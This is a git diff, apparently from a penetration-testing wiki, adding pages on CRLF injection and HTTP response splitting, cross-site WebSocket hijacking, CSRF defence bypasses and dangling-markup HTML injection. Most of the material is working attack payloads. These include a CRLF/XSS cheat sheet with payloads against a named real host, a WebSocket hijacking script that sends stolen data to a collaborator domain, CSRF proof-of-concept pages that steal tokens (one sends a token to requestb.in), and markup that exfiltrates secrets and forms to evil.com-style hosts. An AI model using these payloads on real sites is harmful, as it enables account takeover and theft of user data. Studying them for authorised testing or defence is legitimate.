+In web applications a CRLF injection can have severe impacts, depending on what the application does with single items. Impacts can range from information disclosure to code execution, a direct impact web application security vulnerability. In fact a CRLF injection attack can have very serious repercussions on a web application, even though it was never listed in the OWASP Top 10 list. For example it is also possible to manipulate log files in an admin panel as explained in the below example.
+
+#### An example of CRLF Injection in a log file
+
+Imagine a log file in an admin panel with the output stream pattern of IP - Time - Visited Path, such as the below:
+
+```text
+123.123.123.123 - 08:15 - /index.php?page=home
+```
+
+If an attacker is able to inject the CRLF characters into the HTTP request he is able to change the output stream and fake the log entries. He can change the response from the webs application to something like the below:
+
+```text
+/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
+```
+
+The %0d and %0a are the url encoded forms of CR and LF. Therefore the log entries would look like this after the attacker inserted those characters and the application displays it:
+
+IP - Time - Visited Path
+
+```text
+123.123.123.123 - 08:15 - /index.php?page=home&
+127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
+```
+
+Therefore by exploiting a CRLF injection vulnerability the attacker can fake entries in the log file to obfuscate his own malicious actions. The attacker is literally doing page hijacking and modifying the response. For example imagine a scenario where the attacker has the admin password and executed the restrictedaction parameter, which can only be used by an admin.
+
+The problem is that if the administrator notices that an unknown IP used the restrictedaction parameter, will notice that something is wrong. However, since now it looks like the command was issued by the localhost \(and therefore probably by someone who has access to the server, like an admin\) it does not look suspicious.
+
+The whole part of the query beginning with %0d%0a will be handled by the server as one parameter. After that there is another & with the parameter restrictedactionwhich will be parsed by the server as another parameter. Effectively this would be the same query as:
+
+```text
+/index.php?page=home&restrictedaction=edit
+```
+
+### HTTP Response Splitting
+
+#### Description
+
+Since the header of a HTTP response and its body are separated by CRLF characters an attacker can try to inject those. A combination of CRLFCRLF will tell the browser that the header ends and the body begins. That means that he is now able to write data inside the response body where the html code is stored. This can lead to a Cross-site Scripting vulnerability.
+
+#### An example of HTTP Response Splitting leading to XSS
+
+Imagine an application that sets a custom header, for example:
+
+```text
+X-Your-Name: Bob
+```
+
+The value of the header is set via a get parameter called "name". If no URL encoding is in place and the value is directly reflected inside the header it might be possible for an attacker to insert the above mentioned combination of CRLFCRLF to tell the browser that the request body begins. That way he is able to insert data such as XSS payload, for example:
+
+```text
+?name=Bob%0d%0a%0d%0a<script>alert(document.domain)</script>
+```
+
+The above will display an alert window in the context of the attacked domain.
+
+#### An example of HTTP Response Splitting leading to Redirect
+
+{% embed url="https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62" %}
+
+Browser to:
+
+```text
+/%0d%0aLocation:%20http://myweb.com
+```
+
+And the server responses with the header:
+
+```text
+Location: http://myweb.com
+```
+
+**Other example: \(from** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**\)**
+
+```text
+http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
+```
+
+#### In URL Path
+
+You can send the payload **inside the URL path** to control the **response** from the server:
+
+```text
+http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
+http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
+```
+
+[https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md)
+
+### HTTP Header Injection
+
+#### Description
+
+By exploiting a CRLF injection an attacker can also insert HTTP headers which could be used to defeat security mechanisms such as a browser's XSS filter or the same-origin-policy. This allows the attacker to gain sensitive information like CSRF tokens. He can also set cookies which could be exploited by logging the victim in the attacker's account or by exploiting otherwise unexploitable [cross-site scripting \(XSS\) vulnerabilities](https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/).
+
+#### An example of HTTP Header Injection to extract sensitive data
+
+If an attacker is able to inject the HTTP headers that activate CORS \(Cross Origin Resource Sharing\), he can use javascript to access resources that are otherwise protected by SOP \(Same Origin Policy\) which prevents sites from different origins to access each other.
+
+## Impacts of the CRLF injection Vulnerability
+
+The impact of CRLF injections vary and also include all the impacts of Cross-site Scripting to information disclosure. It can also deactivate certain security restrictions like XSS Filters and the Same Origin Policy in the victim's browsers, leaving them susceptible to malicious attacks.
+
+### How to Prevent CRLF / HTTP Header Injections in Web Applications
+
+The best prevention technique is to not use users input directly inside response headers. If that is not possible, you should always use a function to encode the CRLF special characters. Another good web application security best practise is to update your programming language to a version that does not allow CR and LF to be injected inside functions that set HTTP headers.
+
+### CHEATSHEET
+
+```text
+1. HTTP Response Splitting
+• /%0D%0ASet-Cookie:mycookie=myvalue
+
+2. CRLF chained with Open Redirect
+• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2 
+• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
+• /google.com/%2F..%0D%0AHeader-Test:test2
+• /%0d%0aLocation:%20http://example.com
+
+3. CRLF Injection to XSS
+• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
+• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
+
+4. Filter Bypass
+• %E5%98%8A = %0A = \u560a
+• %E5%98%8D = %0D = \u560d
+• %E5%98%BE = %3E = \u563e (>)
+• %E5%98%BC = %3C = \u563c (<)
+• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
+```
+
+## References
+
+* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)\*\*\*\*
+
diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md
new file mode 100644
index 00000000..6b3618c4
--- /dev/null
+++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md
@@ -0,0 +1,84 @@
+# Cross-site WebSocket hijacking \(CSWSH\)
+
+Most of the information of this page is from **Portswiggers WebSockets tutorials \(main page:** [**https://portswigger.net/web-security/websockets\#intercepting-and-modifying-websocket-messages**](https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages)**\)**
+
+## What are WebSockets
+
+WebSocket connections are initiated over **HTTP** and are typically **long-lived**. Messages can be sent in **either direction at any time** and are not transactional in nature. The connection will normally stay open and idle until either the client or the server is ready to send a message.  
+WebSockets are particularly useful in situations where **low-latency or server-initiated messages** are required, such as real-time feeds of financial data.
+
+## How are WebSocket connections established?
+
+WebSocket connections are normally created using client-side JavaScript like the following:
+
+```javascript
+var ws = new WebSocket("wss://normal-website.com/chat");
+```
+
+The **`wss`** protocol establishes a WebSocket over an encrypted **TLS** connection, while the **`ws`** protocol uses an **unencrypted** connection.
+
+To establish the connection, the browser and server perform a WebSocket handshake over HTTP. The browser issues a WebSocket handshake request like the following:
+
+```javascript
+GET /chat HTTP/1.1
+Host: normal-website.com
+Sec-WebSocket-Version: 13
+Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
+Connection: keep-alive, Upgrade
+Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
+Upgrade: websocket
+```
+
+If the server accepts the connection, it returns a WebSocket handshake response like the following:
+
+```javascript
+HTTP/1.1 101 Switching Protocols
+Connection: Upgrade
+Upgrade: websocket
+Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
+```
+
+At this point, the network connection remains open and can be used to send WebSocket messages in either direction.
+
+**Note**
+
+Several **features** of the WebSocket **handshake** messages are worth noting:
+
+* The **`Connection`** and **`Upgrade`** headers in the request and response **indicate** that this is a **WebSocket handshake**.
+* The **`Sec-WebSocket-Version`** request header specifies the **WebSocket protocol version** that the client wishes to use. This is typically `13`.
+* The **`Sec-WebSocket-Key`** request header contains a Base64-encoded **random value**, which should be randomly generated in each handshake request.
+* The **`Sec-WebSocket-Accept`** response header contains a hash of the value submitted in the `Sec-WebSocket-Key` request header, concatenated with a specific string defined in the protocol specification. This is done to prevent misleading responses resulting from misconfigured servers or caching proxies.
+
+The **`Sec-WebSocket-Key`** header contains a **random value** to prevent errors from caching proxies, and **is not used for authentication or session handling purposes** \(_It's not a CSRF token_\).
+
+## Cross-site WebSocket hijacking \(CSWSH\)
+
+Also known as _cross-origin WebSocket hijacking_.  
+**It is a** [**Cross-Site Request Forgery \(CSRF\)**](csrf-cross-site-request-forgery.md) **on a WebSocket handshake.**
+
+It arises when the **WebSocket handshake** request relies solely on **HTTP cookies** for session handling and does **not contain any CSRF tokens** or other unpredictable values.  
+An attacker can create a **malicious web page** on their own domain which **establishes a cross-site WebSocket** connection to the vulnerable application. The application will handle the connection in the **context of the victim user's session** with the application.
+
+Example of the attack:
+
+```javascript
+<script>
+websocket = new WebSocket('wss://your-websocket-URL')
+websocket.onopen = start
+websocket.onmessage = handleReply
+function start(event) {
+  websocket.send("READY"); //Send the message to retreive confidential information
+}
+function handleReply(event) {
+  //Exfiltrate the confidential information to attackers server
+  fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
+}
+</script>
+```
+
+## Other vulnerabilities
+
+As Web Sockets are a mechanism to **send data to server side and client side**, depending on how the server and client handles the information, **Web Sockets can be used to exploit several other vulnerabilities**:
+
+![](../.gitbook/assets/image%20%28129%29.png)
+
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
new file mode 100644
index 00000000..03c33e94
--- /dev/null
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -0,0 +1,380 @@
+# CSRF \(Cross Site Request Forgery\)
+
+## What is CSRF?
+
+**Cross-site request forger**y \(also known as CSRF\) is a web security vulnerability that allows an attacker to **induce users to perform actions that they do not intend to perform**.   
+This is done by **making a logged in user** in the victim platform access an attacker controlled website and from there **execute** malicious JS code, send forms or retrieve "images" to the **victims account**.
+
+### Requisites
+
+In order to be able to abuse a CSRF vulnerability you first need to **find a relevant action to abuse** \(change password or email, make the victim follow you on a social network, give you more privileges...\). The **session must rely only on cookies**, any other header can't be used to handle the session. An finally, there **shouldn't be unpredictable parameters** on the request.
+
+Several **counter-measures** could be in place to avoid this vulnerability. 
+
+### **Common defenses**
+
+* [**SameSite cookies**](hacking-with-cookies.md#samesite): If the session cookie is using this flag, you may not be able to send the cookie from arbitrary web sites.
+* [**Cross-origin resource sharing**](cors-bypass.md): Depending on which kind of HTTP request you need to perform to abuse the relevant action, you may take int account the **CORS policy of the victim site**. _Note that the CORS policy won't affect if you just want to send a GET request or a POST request from a form and you don't need to read the response._
+* Ask for the **password** user to authorise the action.
+* Resolve a **captcha**
+* Read the **Referrer** or **Origin** headers. If a regex is used it could be bypassed form example with:
+  * http://mal.net?orig=http://example.com \(ends with the url\)
+  * http://example.com.mal.net \(starts with the url\)
+* **Modify** the **name** of the **parameters** of the Post or Get request
+* Use a **CSRF token** in each session. This token has to be send inside the request to confirm the action. This token could be protected with CORS.
+
+### CSRF map
+
+![](../.gitbook/assets/image%20%28307%29.png)
+
+## Defences Bypass
+
+### From POST to GET
+
+Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token but**, you should **check** if a **GET** is also **valid** and if when you send a GET request the **CSRF token is still being validated**.
+
+### Lack of token
+
+Some applications correctly **validate the token when it is present but skip the validation if the token is omitted**.  
+In this situation, the attacker can **remove the entire parameter** containing the token \(not just its value\) to bypass the validation and deliver a CSRF attack.
+
+### CSRF token is not tied to the user session
+
+Some applications do **not validate that the token belongs to the same session** as the user who is making the request. Instead, the application **maintains a global pool of tokens** that it has issued and accepts any token that appears in this pool.  
+In this situation, the attacker can log in to the application using their own account, **obtain a valid token**, and then **feed that token to the victim** user in their CSRF attack.
+
+### Method bypass
+
+If the request is using a "**weird**" **method**, check if the **method** **override functionality** is working.  
+For example, if it's **using a PUT** method you can try to **use a POST** method and **send**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
+
+This could also works sending the **\_method parameter inside the a POST request** or using the **headers**:
+
+* _X-HTTP-Method_
+* _X-HTTP-Method-Override_
+* _X-Method-Override_
+
+### Custom header token bypass
+
+If the request is adding a **custom header** with a **token** to the request as **CSRF protection method**, then:
+
+* Test the request without the **Customized Token and also header.**
+* Test the request with exact **same length but different token**.
+
+### CSRF token is tied to a non-session cookie
+
+Some applications do tie the CSRF token to a cookie, but **not** to the same **cookie** that is used to track **sessions**. This can easily occur when an application employs two different frameworks, one for session handling and one for CSRF protection, which are not integrated together.  
+If the web site contains any **behaviour** that **allows an attacker to set a cookie in a victim's browser**, then an **attack** is possible.
+
+### CSRF token is simply duplicated in a cookie
+
+In a further variation on the preceding vulnerability, some applications do not maintain any server-side record of tokens that have been issued, but instead **duplicate each token within a cookie and a request parameter**. When the subsequent request is validated, the application simply verifies that the **token** submitted in the **request parameter matches** the value submitted in the **cookie**.  
+In this situation, the attacker can again perform a CSRF **attack if the web site contains any cookie setting functionality**.
+
+### Referrer / Origin check bypass
+
+#### Avoid Referrer header
+
+Some applications validate the Referer header when it is present in requests but **skip the validation if the header is omitted**.
+
+```markup
+<meta name="referrer" content="never">
+```
+
+#### Regexp bypasses
+
+```text
+https://hahwul.com (O)
+https://hahwul.com?white_domain_com (O)
+https://hahwul.com;white_domain_com (O)
+https://hahwul.com/white_domain_com/../target.file (O)
+https://white_domain_com.hahwul.com (O)
+https://hahwulwhite_domain_com (O)
+file://123.white_domain_com (X) 
+https://white_domain_com@hahwul.com (X)
+https://hahwul.com#white_domain_com (X)
+https://hahwul.com\.white_domain_com (X)
+https://hahwul.com/.white_domain_com (X)
+```
+
+## **Exploit Examples**
+
+### **Ex-filtrating CSRF Token**
+
+If a **CSRF token** is being used as **defence** you could try to **ex-filtrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
+
+### **Make a GET request using** _**img**_ **tag**
+
+```markup
+<img src=http://google.es?param=VALUE style="display:none" />
+<h1>404 - Page not found</h1>
+The URL you are requesting is no longer available
+```
+
+### Make a GET request using a form
+
+```markup
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form method="GET" action="https://victim.net/email/change-email">
+      <input type="hidden" name="email" value="some@email.com" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+```
+
+### Make a POST request using a form
+
+```markup
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://victim.net/email/change-email">
+      <input type="hidden" name="email" value="some@email.com" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+```
+
+### **Make a Post request using Ajax**
+
+```markup
+<script>
+var xh;
+if (window.XMLHttpRequest)
+  {// code for IE7+, Firefox, Chrome, Opera, Safari
+  xh=new XMLHttpRequest();
+  }
+else
+  {// code for IE6, IE5
+  xh=new ActiveXObject("Microsoft.XMLHTTP");
+  }
+xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
+xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
+xh.send("username=abcd&status=on");
+</script>
+```
+
+### POST request using multipart/form-data content type
+
+```javascript
+myFormData = new FormData();
+var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
+myFormData.append("newAttachment", blob, "pwned.php");
+fetch("http://example/some/path", {
+    method: "post",
+    body: myFormData,
+    credentials: "include"
+});
+```
+
+### POST request using multipart/form-data content type x2
+
+```javascript
+var fileSize = fileData.length,
+boundary = "OWNEDBYOFFSEC",
+xhr = new XMLHttpRequest();
+xhr.open("POST", url, true);
+//  MIME POST request.
+xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
+xhr.setRequestHeader("Content-Length", fileSize);
+var body = "--" + boundary + "\r\n";
+body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
+body += "Content-Type: " + ctype + "\r\n\r\n";
+body += fileData + "\r\n";
+body += "--" + boundary + "--";
+
+//xhr.send(body);
+xhr.sendAsBinary(body);
+```
+
+### **Make a Post request using a Form and Iframe in 2 separated files**
+
+```markup
+<--! expl.html -->
+
+<body onload="envia()">
+<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
+<input type="text" id="pwd" name="pwd" value="otra nueva">
+</form>
+<body>
+<script>
+function envia(){document.getElementById("formulario").submit();}
+</script>
+
+<!-- public.html -->
+<iframe src="2-1.html" style="position:absolute;top:-5000">
+</iframe>
+<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
+```
+
+### **Get a CSRF Token and send a Post request \(x-www-form-urlencoded\) using Ajax**
+
+```javascript
+function submitFormWithTokenJS(token) {
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", POST_URL, true);
+
+    // Send the proper header information along with the request
+    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+
+    // This is for debugging and can be removed
+    xhr.onreadystatechange = function() {
+        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+            //console.log(xhr.responseText);
+        }
+    }
+
+    xhr.send("token=" + token + "&otherparama=heyyyy");
+}
+
+function getTokenJS() {
+    var xhr = new XMLHttpRequest();
+    // This tels it to return it as a HTML document
+    xhr.responseType = "document";
+    // true on the end of here makes the call asynchronous
+    xhr.open("GET", GET_URL, true);
+    xhr.onload = function (e) {
+        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+            // Get the document from the response
+            page = xhr.response
+            // Get the input element
+            input = page.getElementById("token");
+            // Show the token
+            //console.log("The token is: " + input.value);
+            // Use the token to submit the form
+            submitFormWithTokenJS(input.value);
+        }
+    };
+    // Make the request
+    xhr.send(null);
+}
+
+var GET_URL="http://google.com?param=VALUE"
+var POST_URL="http://google.com?param=VALUE"
+getTokenJS();
+```
+
+### **Get a CSRF Token and send a Post request using an iframe, a form and Ajax**
+
+```markup
+<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
+<input type="text" name="username" value="AA">
+<input type="checkbox" name="status" checked="checked">
+<input id="token" type="hidden" name="token" value="" />
+</form>
+
+<script type="text/javascript">
+function f1(){
+    x1=document.getElementById("i1");
+    x1d=(x1.contentWindow||x1.contentDocument);
+    t=x1d.document.getElementById("token").value;
+    
+    document.getElementById("token").value=t;
+    document.getElementById("form1").submit();
+}
+</script> 
+<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
+```
+
+### **Get a CSRF Token with an iframe and write inside the iframe a form a send it**
+
+```markup
+<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>
+
+<script> 
+function read()
+{
+    var name = 'admin2';
+    var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
+    document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data">');
+    document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
+    document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
+    document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
+    document.writeln('</form>');
+    document.forms[0].submit.click();
+}
+</script>
+```
+
+### **Use 2 iframes: get the token with one and send the post request with the other**
+
+```markup
+<script>
+var token;
+function readframe1(){
+  token = frame1.document.getElementById("profile").token.value;
+  document.getElementById("bypass").token.value = token
+  loadframe2();
+}
+function loadframe2(){
+  var test = document.getElementbyId("frame2");
+  test.src = "http://requestb.in/1g6asbg1?token="+token;
+}
+</script>
+
+<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()" 
+sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
+height="600" width="800"></iframe>
+
+<iframe id="frame2" name="frame2" 
+sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
+height="600" width="800"></iframe>
+<body onload="document.forms[0].submit()">
+<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
+  <input type="text" name="username" value="z">
+  <input type="checkbox" name="status" checked="">        
+  <input id="token" type="hidden" name="token" value="0000" />
+  <button type="submit">Submit</button>
+</form>
+```
+
+### **Get a CSRF token with Ajax and send a post with a form**
+
+```markup
+<body onload="getData()">
+
+<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
+  <input type="hidden" name="username" value="root"/>
+  <input type="hidden" name="status" value="on"/>
+  <input type="hidden" id="findtoken" name="token" value=""/>
+  <input type="submit" value="valider"/>
+</form>
+
+<script>
+var x = new XMLHttpRequest();
+function getData() {
+  x.open("GET","http://google.com?param=VALUE",true);
+  x.send(null); 
+}
+x.onreadystatechange = function() {
+  if (x.readyState == XMLHttpRequest.DONE) {
+    var token = x.responseText.match(/name="token" value="(.+)"/)[1];
+    document.getElementById("findtoken").value = token;
+    document.getElementById("form").submit();
+  }
+}
+</script>
+```
+
+## Tools <a id="tools"></a>
+
+* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
+
+## References
+
+* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
+* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)
+
diff --git a/pentesting-web/dangling-markup-html-scriptless-injection.md b/pentesting-web/dangling-markup-html-scriptless-injection.md
new file mode 100644
index 00000000..35824eb3
--- /dev/null
+++ b/pentesting-web/dangling-markup-html-scriptless-injection.md
@@ -0,0 +1,243 @@
+# Dangling Markup - HTML scriptless injection
+
+## Resume
+
+This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.  
+It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
+
+Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
+
+## Main Applications
+
+### Stealing clear text secrets
+
+If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t\(you can do the same thing using a double quote,take a look which could be more interesting to use\).
+
+If the `img` tag is forbidden \(due to CSP for example\) you can also use `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
+
+```text
+<img src='http://attacker.com/log.php?HTML=
+<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
+<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
+```
+
+Note that **Chrome blocks HTTP URLs** with "&lt;" or "\n" in it, so you could try other protocol schemes like "ftp".
+
+You can also abuse CSS `@import` \(will send all the code until it find a ":"\)
+
+```markup
+<style>@import//hackvertor.co.uk?     <--- Injected
+<b>steal me!</b>;
+```
+
+You could also use **`<table`**:
+
+```bash
+<table background='//your-collaborator-id.burpcollaborator.net?'
+```
+
+You could also insert a `<base` tag. All the information will be sent until the quote is closed but it requires some user interaction \(the user must click in some link, because the base tag will have changed the domain pointed by the link\):
+
+```markup
+<base target='        <--- Injected
+steal me'<b>test</b>
+```
+
+### Stealing forms
+
+```markup
+<base href='http://evil.com/'>
+```
+
+Then, the forms that send data to path \(like `<form action='update_profile.php'>`\) will send the data to the malicious domain.
+
+### Stealing forms 2
+
+Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker.
+
+### Stealing forms 3
+
+The button can change the URL where the information of the form is going to be sent with the attribute "formaction":
+
+```markup
+<button name=xss type=submit formaction='https://google.com'>I get consumed!
+```
+
+An attacker can use this to steal the information.
+
+### Stealing clear text secrets 2
+
+Using the latest mentioned technique to steal forms \(injecting a new form header\) you can then inject a new input field:
+
+```markup
+<input type='hidden' name='review_body' value="
+```
+
+and this input field will contain all the content between its double quote and the next double quote in the HTML. This attack mix the "_**Stealing clear text secrets**_" with "_**Stealing forms2**_".
+
+You can do the same thing injecting a form and an `<option>` tag. All the data until a closed `</option>` is found will be sent:
+
+```markup
+<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
+```
+
+### Form parameter injection
+
+You can change the path of a form and insert new values so an unexpected action will be performed:
+
+```markup
+<form action='/change_settings.php'>
+<input type='hidden' name='invite_user' 
+  value='fredmbogo'>                                        ← Injected lines
+
+<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
+...
+<input type="text" name="invite_user" value="">             ← Subverted field
+...
+<input type="hidden" name="xsrf_token" value="12345">
+...
+</form>
+```
+
+### Stealing clear text secrets via noscript
+
+`<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript \(you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)\).
+
+A way to exfiltrate the content of the web page from the point of injection to the bottom to an attacker controlled site will be injecting this:
+
+```markup
+<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
+```
+
+### Bypassing CSP with user interaction
+
+From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload:
+
+```markup
+<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
+<base target='
+```
+
+Note that you will ask the **victim** to **click on a link** that will **redirect** him to **payload** controlled by you. Also note that the **`target`** attribute inside the **`base`** tag will contain **HTML content** until the next single quote.  
+This will make that the **value** of **`window.name`** if the link is clicked is going to be all that **HTML content**. Therefore, as you **control the page** where the victim is accessing by clicking the link, you can access that **`window.name`** and **exfiltrate** that data:
+
+```markup
+<script>
+if(window.name) {
+    new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
+</script>
+```
+
+### Misleading script workflow 1 - HTML namespace attack
+
+Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:
+
+```markup
+<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
+...
+Share this status update with:                              ← Legitimate optional element of a dialog
+<input id='share_with' value=''>
+
+...
+
+function submit_status_update() {
+  ...
+  request.share_with = document.getElementById('share_with').value;
+  ...
+}
+```
+
+### Misleading script workflow 2 - Script namespace attack
+
+Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:
+
+```markup
+<img id='is_public'>                                        ← Injected markup
+
+...
+
+// Legitimate application code follows
+
+function retrieve_acls() {
+  ...
+  if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
+    is_public = true;
+  else
+    is_public = false;
+}
+
+function submit_new_acls() {
+  ...
+  if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
+  ...
+}
+```
+
+### Abuse of JSONP
+
+If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:
+
+```markup
+<script src='/editor/sharing.js'>:              ← Legitimate script
+  function set_sharing(public) {
+    if (public) request.access_mode = AM_PUBLIC;
+      else request.access_mode = AM_PRIVATE;
+    ...
+  }
+
+<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
+  set_sharing({ ... })
+```
+
+Or you can even try to execute some javascript:
+
+```markup
+<script src='/search?q=a&call=alert(1)'></script>
+```
+
+### Iframe abuse
+
+Notice that a **child document can view and set location property for parent, even if cross-origin.** This means that you can make the client access any other page by loading inside an **iframe** some code like:
+
+```markup
+<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
+```
+
+This can be mitigated with something like: _**sandbox=’ allow-scripts allow-top-navigation’**_
+
+### &lt;meta abuse
+
+You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`   
+
+
+This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
+
+### New &lt;portal HTML tag
+
+You can find a very **interesting research** on exploitable vulnerabilities of the &lt;portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).  
+At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work.
+
+```markup
+<portal src='https://attacker-server?
+```
+
+### HTML Leaks
+
+Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
+
+## References
+
+All the techniques presented here and more can view reviewed with more details in:
+
+{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
+
+Another HTML tags that can be abused can be find here:
+
+{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
+
+More info:
+
+{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
+
+
+
